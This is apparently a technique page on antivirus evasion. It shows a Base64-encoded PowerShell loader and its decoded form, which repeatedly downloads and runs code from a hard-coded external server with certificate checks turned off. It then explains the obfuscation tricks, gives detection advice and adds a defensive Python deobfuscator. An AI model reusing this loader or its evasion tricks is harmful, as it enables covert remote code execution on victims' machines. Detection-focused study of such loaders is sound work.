Antivirus Bypass

Evasion tactics: polymorphic and obfuscated construction of malicious payloads to avoid detection by threat-protection products, plus other techniques to disable AMSI.

PowerShell payload generator with obfuscation techniques

Obfuscated PowerShell Loader

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -exec BYpass -C $e='JGdsb2JhbDpTbGVlcD0yMTYwMDskZ2xvYmFsOkFkZHI9J2h0dHBzOi8vOC4yMjAuMTg0LjE3Nzo0NDMnOyRjMT0nW1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrID0geyR0cnVlfTskYz0oTmV3LU9iamVjdCBOZXQuNDQ0KScuUmVwbGFjZSgnNDQ0JywnV2ViQ2xpZW50Jyk7JGMyPSd3aGlsZSgxKSAgeyRjLmhlYWRlcnMuYWRkKCJ1c2VyLWFnZW50IiwiU2FmYXJpcy81MzcuMzYiKTt0cnl7aWV4ICRjLkRvd25sb2FkU3RyaW5nKCInJyska2V5KScpfWNhdGNoIHsgc2xlZXAgJGdsb2JhbDpTbGVlcCB9fSc7aWV4KCRjMSskYzIrJGMzKSc=';ieX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($e)))

Decoded PowerShell Payload

$global:Sleep=21600;$global:Addr='https://8.'+'220.'+'184.'+'177:443';$c1='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$c=(New-Object Net.444)'.Replace('444','WebClient');$c2='while(1){$c.headers.add("user-agent","Safaris/537.36");try{iex $c.Download';$c3='String("'+$global:Addr+'/connect")}catch{sleep $global:Sleep}}';iex($c1+$c2+$c3)

Technique

Living off the Land (LotL). By launching a legitimate, signed system binary (powershell.exe) and keeping the second stage in memory, the attacker never drops a suspicious executable on disk, which defeats file-based antivirus scanning. Detection therefore has to come from command-line logging, PowerShell script block logging (Event ID 4104) and AMSI, all of which see the decoded script at execution time, rather than from file signatures.

  1. Evasion and Obfuscation Tactics
  • Base64 encoding: the whole loader travels as one Base64 string and is decoded with [System.Text.Encoding]::UTF8.GetString (so the bytes are UTF-8, unlike -EncodedCommand, which expects UTF-16LE). A keyword scanner that looks for DownloadString or WebClient in the command line sees only the encoded blob; it defeats nothing that decodes first.
  • Execution policy bypass (-exec BYpass): -ExecutionPolicy Bypass turns off the script execution policy for this process. The policy is a safety feature, not a security boundary, and the mixed case is a cheap variation against case-sensitive string matches.
  • Hidden window (-w hidden): -WindowStyle Hidden keeps a console window from appearing on the victim's screen, so the loader runs silently.
  • String fragmentation and replacement: instead of writing Net.WebClient, the loader writes Net.444 and calls .Replace('444','WebClient') at run time, and the C2 address is split into 'https://8.'+'220.'+'184.'+'177:443'. Signatures that match the literal class name or IP address fail because the complete string only exists in memory after evaluation.
  • TLS validation bypass: [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} makes the process accept any certificate, so the C2 channel is encrypted HTTPS on port 443 without the operator needing a legitimate certificate. The self-signed or mismatched certificate is itself an indicator for network monitoring.
  • Long beacon interval (low and slow): $global:Sleep is 21,600 seconds (6 hours). Only the catch branch sleeps, so while the C2 is unreachable the loader retries every 6 hours and outlasts sandboxes that detonate a sample for a few minutes; once it does get a response it runs the returned code and loops again immediately.
  2. Technical Execution Flow
  • Environment setup: sets the C2 address in $global:Addr, disables certificate validation, and creates the WebClient object (spelled Net.444 until .Replace runs).
  • Infinite loop (while(1)): adds a browser-like User-Agent header (Safaris/537.36), downloads a string from the C2 server's /connect endpoint, and passes it to iex (Invoke-Expression), which executes whatever the server returned in memory. The reverse-shell code itself is never on disk; it is whatever the C2 serves at /connect.
  • Error handling and persistence: if the download or execution throws, the catch block sleeps for 6 hours and the loop retries instead of crashing. This is in-process persistence only; nothing survives a reboot or the process being killed unless the second stage installs it.
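Every tactic listed above is a string-building trick, so the defender's first step is to reverse them before matching anything. The following Python script is an added example, not code from this page or repository: it pulls the Base64 blob out of a command line of the shape shown above, decodes it as UTF-8 (the loader uses UTF8.GetString, not -EncodedCommand's UTF-16LE), folds literal concatenation, .Replace() calls and the $c1+$c2+$c3 join inside iex, and then compares what a keyword/URL scan sees at each stage. The sample command line is constructed for the example with a documentation address (203.0.113.10), and the regexes are heuristics for this single-quoted-literal style, not a PowerShell parser.

```python
"""Static deobfuscation of the loader pattern described on this page.

Added example, not code from the original page or repository. It reverses the
string-building layers the page lists (Base64 wrapper, literal concatenation,
.Replace() on a literal, $c1+$c2+$c3 joined inside iex) so IOC matching runs on
the normalised script instead of the raw command line. Regex heuristics only,
not a PowerShell parser. 203.0.113.10 is a documentation address, not a C2.
"""
import base64
import re

# Constructed sample in the shape of the loader on this page (not the page's blob).
_INNER = (
    "$global:Sleep=21600;$global:Addr='https://203.'+'0.'+'113.'+'10:443';"
    "$c1='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "$c=(New-Object Net.444);'.Replace('444','WebClient');"
    "$c2='while(1){$c.headers.add(\"user-agent\",\"Safaris/537.36\");try{iex $c.Download';"
    "$c3='String(\"'+$global:Addr+'/connect\")}catch{sleep $global:Sleep}}';iex($c1+$c2+$c3)"
)
SAMPLE_CMDLINE = (
    "powershell.exe -w hidden -exec BYpass -C $e='"
    + base64.b64encode(_INNER.encode("utf-8")).decode("ascii")
    + "';ieX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($e)))"
)

IOC_KEYWORDS = ("DownloadString", "WebClient", "ServerCertificateValidationCallback", "iex")

_B64_ARG = re.compile(r"\$\w+\s*=\s*'([A-Za-z0-9+/=]{16,})'")
_LIT = r"'([^']*)'"
_CONCAT = re.compile(_LIT + r"\s*\+\s*" + _LIT)                        # 'a'+'b'
_REPLACE = re.compile(_LIT + r"\.Replace\(" + _LIT + r"\s*,\s*" + _LIT + r"\)", re.I)
_ASSIGN = re.compile(r"\$((?:\w+:)?\w+)\s*=\s*" + _LIT + r"\s*;")     # $name='lit';
_VAR = re.compile(r"\$((?:\w+:)?\w+)")
_URL = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-]*)?")
_SLEEP = re.compile(r"\$global:Sleep\s*=\s*(\d+)", re.I)


def decode_loader(cmdline: str) -> str:
    """Extract the Base64 blob from the -C argument and decode it."""
    # This loader decodes with UTF8.GetString, so the bytes are UTF-8;
    # a -EncodedCommand blob would be UTF-16LE instead.
    m = _B64_ARG.search(cmdline)
    if not m:
        raise ValueError("no Base64 argument found in command line")
    return base64.b64decode(m.group(1)).decode("utf-8")


def normalize(script: str) -> str:
    """Fold the string-building tricks until the script stops changing."""
    prev = None
    while prev != script:
        prev = script
        # 'https://8.'+'220.'  ->  'https://8.220.'
        script = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        # 'Net.444'.Replace('444','WebClient')  ->  'Net.WebClient'
        script = _REPLACE.sub(
            lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", script)
        # $c1+$c2+$c3  ->  the literals assigned to them, once those are known
        assigned = dict(_ASSIGN.findall(script))

        def sub_var(m):
            before = m.string[: m.start()].rstrip()
            after = m.string[m.end():].lstrip()
            if m.group(1) in assigned and (before.endswith("+") or after.startswith("+")):
                return "'" + assigned[m.group(1)] + "'"
            return m.group(0)

        script = _VAR.sub(sub_var, script)
    return script


def keyword_hits(text: str) -> list:
    """Case-insensitive keyword scan, reported in IOC_KEYWORDS order."""
    low = text.lower()
    return [k for k in IOC_KEYWORDS if k.lower() in low]


def launcher_flags(cmdline: str) -> list:
    # Tolerate case variation and the abbreviated switch forms the page shows.
    flags = []
    if re.search(r"-w\w*\s+hidden", cmdline, re.I):
        flags.append("hidden_window")
    if re.search(r"-ex\w*\s+bypass", cmdline, re.I):
        flags.append("execution_policy_bypass")
    return flags


def extract_iocs(cmdline: str) -> dict:
    """What a scanner sees at each stage: command line, decoded, normalised."""
    decoded = decode_loader(cmdline)
    normalized = normalize(decoded)
    sleep = _SLEEP.search(decoded)
    return {
        "launcher_flags": launcher_flags(cmdline),
        "keywords_cmdline": keyword_hits(cmdline),
        "keywords_decoded": keyword_hits(decoded),
        "keywords_normalized": keyword_hits(normalized),
        "urls_decoded": sorted(set(_URL.findall(decoded))),
        "urls_normalized": sorted(set(_URL.findall(normalized))),
        "sleep_seconds": int(sleep.group(1)) if sleep else None,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_CMDLINE), indent=2))
```

Running it shows the progression the bullets describe: the raw command line yields only iex, the decoded script already exposes WebClient (it appears verbatim as the .Replace argument) and ServerCertificateValidationCallback, and only the normalised script reveals DownloadString and the full /connect URL. PowerShell script block logging records the same fully resolved text when iex runs the joined string, which is why it and AMSI, rather than command-line pattern matching, are the reliable detection points for this loader.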